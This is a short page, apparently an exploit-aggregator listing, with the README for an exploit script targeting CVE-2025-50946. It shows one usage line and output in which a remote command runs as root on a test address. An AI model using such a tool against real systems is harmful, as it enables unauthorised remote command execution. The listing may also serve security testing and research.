Share
## https://sploitus.com/exploit?id=B9D62132-F56E-5322-9338-AE191298A577
# cve-2025-50946
Exploit script for CVE-2025-50946

# Example Usage
```shell
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload... 
uid=0(root) gid=0(root) groups=0(root)
```